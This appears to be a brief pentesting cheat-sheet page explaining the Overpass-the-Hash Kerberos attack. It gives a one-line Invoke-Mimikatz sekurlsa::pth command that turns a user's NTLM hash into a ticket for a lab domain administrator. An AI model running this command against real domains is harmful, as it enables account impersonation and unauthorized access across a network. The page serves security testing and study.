search
GithubTwitter

Overpass the Hash

hashtag
General

  • Similar to pass-the-hash

  • Creates valid kerberos ticket from NTLM hash of user

  • Able to access any domain service and not just services that support NTLM authentication like in PTH attacks

hashtag
Exploitation with Invoke-Mimikatz

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:lab.local /ntlm:<HASH> /run:powershell.exe"'
PreviousDC SyncNextTicket Harvesting

Last updated